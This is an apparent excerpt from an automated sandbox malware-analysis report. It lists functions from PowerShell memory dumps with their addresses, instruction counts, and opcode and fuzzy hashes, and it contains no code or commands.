                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 59f30bb5c4c97d4934faa504f75ba9fa0e500605c348bdefb86813b4514e76e5
                    • Instruction ID: b72ed831ba75a47747cc0e1e86a31ca03b00a4c1e9d33367f21c25c2d1e0c521
                    • Opcode Fuzzy Hash: 59f30bb5c4c97d4934faa504f75ba9fa0e500605c348bdefb86813b4514e76e5
                    • Instruction Fuzzy Hash: 9EE0C2BA6546009BEB24E754F9457BD33A2DBC5364F108539E219C3640EF38BC468B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1757A Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 278f29b94b42e5ddf35eaf2c85f56b6c1cc413b24fcb57d3e41a0868097befe5
                    • Instruction ID: 347feb95b48ba9143911364b62757a613eaf96d72579200f8f98b6b677666b74
                    • Opcode Fuzzy Hash: 278f29b94b42e5ddf35eaf2c85f56b6c1cc413b24fcb57d3e41a0868097befe5
                    • Instruction Fuzzy Hash: 6BE0C2B66541009BEB20E794F5467BE33A2EBC1355F008579E219C3680DF78AC464F92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A174BA Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcae09bf3110ac324bd731ae796e3347481516799e7a6a77f089c8db9cc90b14
                    • Instruction ID: 226b37ba53b347c214b31e6e9de3e5c6e125dab152d802a5fcdbaae21422e739
                    • Opcode Fuzzy Hash: bcae09bf3110ac324bd731ae796e3347481516799e7a6a77f089c8db9cc90b14
                    • Instruction Fuzzy Hash: AEE0C2B66542059BEB20E754F8417FD33A2EBC1364F008539E21AC3A40DF78AC469B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A172FA Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a23d04fc77f4479dbf6fe1e29b1f5ae1159530521290dcb4ab8f623400446090
                    • Instruction ID: 1b03e89573588afed1ad70e62483fd91a87eba03081a5d265078e16b0a1f4cc7
                    • Opcode Fuzzy Hash: a23d04fc77f4479dbf6fe1e29b1f5ae1159530521290dcb4ab8f623400446090
                    • Instruction Fuzzy Hash: A1E0C2B66541048BEB20EB54E4467FD33A6DBC2354F10C539E219C3640DF78A9065BA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A171BA Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ffcddc449ac0d03defe2ff9b0aa36c7f8c73259e790647f901dc6bd99d39e076
                    • Instruction ID: fba99c58a9a25f9d2d2ac1a7077e869e1579ad96b6fbe618dddd7ca571044ca2
                    • Opcode Fuzzy Hash: ffcddc449ac0d03defe2ff9b0aa36c7f8c73259e790647f901dc6bd99d39e076
                    • Instruction Fuzzy Hash: 54E0C2B66682048BEB20E794E8417FD73A2EBC1354F008939E229C3640DF78A9065B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A171FA Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcff23f372ca83eacdd1c2844280aa0d3c0cc87750bb898589dced8fc017516d
                    • Instruction ID: df14466dbf8b9890a3e01b287c40c372c4c28eea35b9bfe5fcc4994111fb4d01
                    • Opcode Fuzzy Hash: bcff23f372ca83eacdd1c2844280aa0d3c0cc87750bb898589dced8fc017516d
                    • Instruction Fuzzy Hash: AAE0C2BA654204CBEB20EB54F4417FD73A2EBC1354F108939E229C3640DF79A8069B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1713A Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2cb97916276ba66826ef4d56547af7c6ae19c1c545b644eca348b8fb6266ab09
                    • Instruction ID: eec3549f7af82aabd6558085f4c71099ca3b780c94ab72ec2a3d6fb3baed0fe2
                    • Opcode Fuzzy Hash: 2cb97916276ba66826ef4d56547af7c6ae19c1c545b644eca348b8fb6266ab09
                    • Instruction Fuzzy Hash: 76E0CD7565420587DB24D754E4416FD73A2DBC1354F004539D219C3640DF74B9855BD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1717A Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cb6e29d69bd8f960536452f0b7bcc9e0d8177adf0e6e423f73fd15defa89fa63
                    • Instruction ID: 55690e4e079df4a5611e1f3b21770eb0334c985924295504649554447bbb5467
                    • Opcode Fuzzy Hash: cb6e29d69bd8f960536452f0b7bcc9e0d8177adf0e6e423f73fd15defa89fa63
                    • Instruction Fuzzy Hash: D3E0C2BA654204CBEB20E754E4416FD73A2EBC1354F048539E219C3640DF78A8065B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B0FE80 Relevance: .0, Instructions: 16COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f91bc9e52ef49577672aae2f428dd6d9b4521d4a5b40192cf0ee5eda39511e2
                    • Instruction ID: ef54917a094c39b3f7065b6722fa20a8f930897e18413fd3cb5ffccb737a58ed
                    • Opcode Fuzzy Hash: 1f91bc9e52ef49577672aae2f428dd6d9b4521d4a5b40192cf0ee5eda39511e2
                    • Instruction Fuzzy Hash: 13D05E352100109FC741EB68E408D8A7BAAEF492247115195E90D87321DB75EC008B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1C6F8 Relevance: .0, Instructions: 15COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a287456aca19ff60169c22407a2398b2b3eaf4fcc6fffc90e78e456f0204590
                    • Instruction ID: 1786c6972802eb3ef42f1db7e4071bff85a45853d49e93cbd5e5bf6a456e599c
                    • Opcode Fuzzy Hash: 0a287456aca19ff60169c22407a2398b2b3eaf4fcc6fffc90e78e456f0204590
                    • Instruction Fuzzy Hash: 03D0C975B086118F9728CB3DB410853B7E6AB88360311C47EE86AC7704EB74EC018F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1DC48 Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e2bd919884b24aa95c22c78193991b48a82afda05754cf983d0cff26a0ace557
                    • Instruction ID: 7c9fbea7f6da13ff7a3e82891c80ae8da485dfafb6a79d1755808f7cf3c86ca4
                    • Opcode Fuzzy Hash: e2bd919884b24aa95c22c78193991b48a82afda05754cf983d0cff26a0ace557
                    • Instruction Fuzzy Hash: 90B0923BB18028CB9A085A9DB8550ECF339E6C9126F605077E22EC20869B758A294690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1D4B9 Relevance: .0, Instructions: 9COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fc0be0c48afd20bd2185e3edf65d80524ee0520bfe5a0e02d9b9a3bbca59942
                    • Instruction ID: b2ad208492609770aa2c567a870162936976a23ea1e775c08681dc8c2dc28be7
                    • Opcode Fuzzy Hash: 4fc0be0c48afd20bd2185e3edf65d80524ee0520bfe5a0e02d9b9a3bbca59942
                    • Instruction Fuzzy Hash: ABC02B33B0814899DB00A6FC74098DCF730D843035F400267D23A414C1532183148210
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B0F670 Relevance: .0, Instructions: 7COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 36e3a4a9a4b98b0d51a8985e213de6837da9dc6a7359d59a93124cb3c37c3803
                    • Instruction ID: f3f2a0a642ad4023dc382e45e20ac1082d4290c7609959182f0e4b790432af91
                    • Opcode Fuzzy Hash: 36e3a4a9a4b98b0d51a8985e213de6837da9dc6a7359d59a93124cb3c37c3803
                    • Instruction Fuzzy Hash: 7EB012CA904984C4F25021E09C1538410B0EFD5304FCEC8720D77203803C0D60268091
                    Uniqueness

                    Uniqueness Score: -1.00%